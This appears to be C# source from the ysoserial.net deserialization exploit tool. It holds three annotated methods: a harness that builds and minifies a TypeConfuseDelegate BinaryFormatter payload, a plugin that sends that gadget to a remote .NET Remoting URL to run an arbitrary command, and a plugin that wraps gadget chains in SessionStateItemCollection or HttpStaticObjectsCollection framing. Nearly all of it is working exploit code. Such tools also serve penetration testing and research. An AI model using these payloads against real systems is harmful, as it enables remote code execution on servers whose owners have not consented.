/// <summary>
/// Test-harness entry used as the worked example for minifying the
/// TypeConfuseDelegateGenerator BinaryFormatter payload: builds the payload for a
/// fixed sample command line, hands it to <c>BinaryFormatterMinifier.MinimiseBFAndRun</c>,
/// prints the result as UTF-8 text and then blocks on <c>Console.ReadLine</c>.
/// </summary>
/// <remarks>
/// The stream is also rendered to JSON via <c>AdvancedBinaryFormatterParser.StreamToJson</c>;
/// that string is not consumed by this method (the call is kept so the sequence matches the
/// original harness). The sample <c>InputArgs</c> is stored on the <c>sampleInputArgs</c> field.
/// </remarks>
private void MinimiseTCDJsonAndRun()
{
    const string sampleApp = "TestConsoleApp_YSONET";
    const bool errorsAreOk = false;

    // Field, not a local: the original harness keeps the sample arguments on the instance.
    sampleInputArgs = new InputArgs(sampleApp + " /foo bar", true, false, false, false, true, null);

    var generator = new TypeConfuseDelegateGenerator();
    var serialized = (byte[])generator.GenerateWithNoTest("binaryformatter", sampleInputArgs);

    // JSON view of the BinaryFormatter stream; not used further here.
    string asJson = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(serialized), false, true, true);

    byte[] minimised = BinaryFormatterMinifier.MinimiseBFAndRun(serialized, sampleInputArgs, errorsAreOk, true);
    Console.WriteLine(Encoding.UTF8.GetString(minimised));
    Console.ReadLine();
}
/// <summary>
/// Plugin entry point. Parses <paramref name="args"/> with <c>options</c>, requires both the
/// <c>url</c> and <c>command</c> options to be present, then obtains a .NET Remoting proxy for
/// <c>url</c> and calls <c>Equals</c> on it with the TypeConfuseDelegate gadget built from
/// <c>command</c>. Any exception while parsing or validating is printed with the usage hint and
/// the process exits with -1; an exception from the remote call is printed and swallowed.
/// </summary>
/// <param name="args">Plugin command-line arguments.</param>
/// <returns>The fixed string "Payload already sent"; no payload bytes are returned.</returns>
public object Run(string[] args)
{
    try
    {
        options.Parse(args);

        // Validate in the same order as before: URL first, then command.
        string missing = string.IsNullOrWhiteSpace(url) ? "A URL must be provided."
                       : string.IsNullOrWhiteSpace(command) ? "A command must be provided."
                       : null;
        if (missing != null)
        {
            throw new ArgumentException(missing);
        }
    }
    catch (Exception e)
    {
        // Covers the parser's own exception type as well as the ArgumentException above.
        Console.Write("ysoserial: ");
        Console.WriteLine(e.Message);
        Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
        Environment.Exit(-1);
    }

    try
    {
        if (secure)
        {
            // Second argument is ensureSecurity: the channel is registered with security enabled.
            ChannelServices.RegisterChannel(new TcpChannel(), true);
        }

        object remoteProxy = Activator.GetObject(typeof(MarshalByRefObject), url);
        object gadget = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(command);
        remoteProxy.Equals(gadget);
    }
    catch (Exception e)
    {
        Console.WriteLine(e.ToString());
        Console.WriteLine();
    }

    return "Payload already sent";
}
/// <summary>
/// Plugin entry point. Parses the plugin options into an <c>InputArgs</c>, then builds a
/// serialized payload whose container depends on <c>mode</c>: when it equals
/// "sessionstateitemcollection" (compared after <c>ToLower()</c>) the TypeConfuseDelegate gadget
/// is stored in a <c>SessionStateItemCollection</c> and written with that type's own
/// <c>Serialize</c>; for any other value a TextFormattingRunProperties BinaryFormatter payload is
/// prefixed with 7 bytes (the inline comments attribute them to ReadInt32/ReadString/ReadBoolean/
/// ReadByte) and used as-is.
/// When <c>test</c> is set, each branch round-trips the bytes through the matching
/// <c>Deserialize</c> on an in-memory stream as a local self-check; nothing leaves the process.
/// </summary>
/// <param name="args">Plugin command-line arguments.</param>
/// <returns>The payload bytes boxed as <c>object</c>; the initial "" is overwritten by whichever branch runs.</returns>
public object Run(string[] args)
{
    InputArgs inputArgs = new InputArgs();
    List <string> extra;
    try
    {
        extra = options.Parse(args);
        inputArgs.Cmd = command;
        inputArgs.Minify = minify;
        inputArgs.UseSimpleType = useSimpleType;
        inputArgs.Test = test;
    }
    catch (OptionException e)
    {
        // Only option-parsing failures are handled here; anything else propagates.
        Console.Write("ysoserial: ");
        Console.WriteLine(e.Message);
        Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
        System.Environment.Exit(-1);
    }

    object payload = "";

    // NOTE(review): IsNullOrWhiteSpace already covers the IsNullOrEmpty case; the first test is redundant.
    if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
    {
        Console.Write("ysoserial: ");
        Console.WriteLine("Incorrect plugin mode/arguments combination");
        Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
        System.Environment.Exit(-1);
    }

    // NOTE(review): ToLower() is culture-sensitive; string.Equals(..., StringComparison.OrdinalIgnoreCase) is the
    // usual form for a mode keyword. Any value other than this keyword falls into the else branch below.
    if (mode.ToLower().Equals("sessionstateitemcollection"))
    {
        /* I decided to change the TypeConfuseDelegateGenerator class and use its gadget instead of doing this through the following hacky way */
        /* hacky way begin
         * byte[] tempPayload_init = (byte[])new TypeConfuseDelegateGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
         * byte[] tempPayload = new byte[tempPayload_init.Length + 1]; // adding one byte initially to fix the length problem
         * tempPayload_init.CopyTo(tempPayload, 0);
         * System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
         * items[""] = tempPayload;
         * MemoryStream stream = new MemoryStream();
         * BinaryWriter writer = new BinaryWriter(stream);
         * items.Serialize(writer);
         * stream.Flush();
         * tempPayload = stream.ToArray();
         * byte[] newSerializedData = new byte[tempPayload.Length-27-1-1]; // yes don't ask about the numbers! it's magical!
         * Array.Copy(tempPayload, 0, newSerializedData, 0, 9); // reading first 9 bytes
         * Array.Copy(tempPayload, 36, newSerializedData, 9, tempPayload.Length-27-1-9-1); // ignoring 27 bytes after 9 bytes + reading the rest + ignoring the last byte
         * newSerializedData[13] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream
         * // hacky way ends */

        /* here it is using the sane way: let SessionStateItemCollection produce the framing itself */
        object serializedData = (object)TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
        System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
        items[""] = serializedData; // empty key; the gadget object is the single item
        MemoryStream stream = new MemoryStream();
        BinaryWriter writer = new BinaryWriter(stream);
        items.Serialize(writer);
        stream.Flush();
        payload = stream.ToArray();

        if (test)
        {
            // PoC on how it works in practice: deserialize the bytes we just produced from memory.
            stream = new MemoryStream((byte[])payload);
            BinaryReader binReader = new BinaryReader(stream);
            // NOTE(review): this local 'test' shadows the plugin's 'test' flag inside this block; a name such as
            // 'roundTrip' would avoid the confusion.
            System.Web.SessionState.SessionStateItemCollection test = System.Web.SessionState.SessionStateItemCollection.Deserialize(binReader);
            test.GetEnumerator();
        }
    }
    else
    {
        // HttpStaticObjectsCollection
        byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
        byte[] newSerializedData = new byte[serializedData.Length + 7]; // ReadInt32 + ReadString + ReadBoolean + ReadByte
        serializedData.CopyTo(newSerializedData, 7); // bytes 1..4 (ReadString) are left as zero
        newSerializedData[0] = 1; // for ReadInt32
        newSerializedData[5] = 1; // for ReadBoolean
        newSerializedData[6] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream
        payload = newSerializedData;

        if (test)
        {
            // PoC on how it works in practice: a failed round-trip is reported via Debugging.ShowErrors, not thrown.
            try
            {
                MemoryStream stream = new MemoryStream((byte[])payload);
                BinaryReader binReader = new BinaryReader(stream);
                // NOTE(review): same shadowing of the 'test' flag as in the other branch.
                System.Web.HttpStaticObjectsCollection test = System.Web.HttpStaticObjectsCollection.Deserialize(binReader);
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
    }

    return (payload);
}